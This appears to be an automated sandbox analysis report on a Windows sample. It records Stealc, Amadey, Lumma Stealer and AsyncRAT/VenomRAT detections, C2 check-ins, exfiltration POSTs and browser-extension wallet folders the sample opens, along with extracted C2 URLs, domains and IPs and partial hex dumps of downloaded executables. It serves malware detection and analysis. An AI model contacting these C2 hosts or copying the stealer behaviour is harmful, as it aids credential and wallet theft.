Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50280 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2141301093.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: d985563cac.exe, 00000010.00000003.2996415101.0000000008590000.00000004.00001000.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000002.3082074976.0000000006632000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2141301093.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe	Memory has grown: Private usage: 1MB later: 40MB
Source: firefox.exe	Memory has grown: Private usage: 1MB later: 181MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49778 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49784
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49806 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49829 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.4:58711 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49850 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49852 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49859 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49864 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49869 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49877 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49871 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49872 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49884 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49888 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49889 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49895 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49900 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49908 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49899 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49918 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49919 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49928 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49933 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49936 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49935 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49920 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49945 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49956 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49960 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49967 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49965 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 205.209.109.10:4449 -> 192.168.2.4:49974
Source: Network traffic	Suricata IDS: 2052265 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (VenomRAT) : 205.209.109.10:4449 -> 192.168.2.4:49974
Source: Network traffic	Suricata IDS: 2052267 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (VenomRAT) : 205.209.109.10:4449 -> 192.168.2.4:49974
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50002 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50014
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50034 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 205.209.109.10:4449 -> 192.168.2.4:50045
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49984 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50016 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50079 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:50292 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 205.209.109.10:4449 -> 192.168.2.4:50319
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49850 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49850 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49884 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49884 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49859 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49859 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49869 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49889 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49945 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49919 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49889 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49928 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49928 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49984 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50016 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49918 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49918 -> 104.21.80.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: impend-differ.biz
Source: Malware configuration extractor	URLs: formy-spill.biz
Source: Malware configuration extractor	URLs: covery-mover.biz
Source: Malware configuration extractor	URLs: print-vexer.biz
Source: Malware configuration extractor	URLs: dwell-exclaim.biz
Source: Malware configuration extractor	URLs: dare-curbys.biz
Source: Malware configuration extractor	URLs: atten-supporse.biz
Source: Malware configuration extractor	URLs: se-blurry.biz
Source: Malware configuration extractor	URLs: zinc-sneark.biz
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: global traffic

TCP traffic: 192.168.2.4:49813 -> 205.209.109.10:7723

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 23:42:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 23:42:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 23:42:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 23:42:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 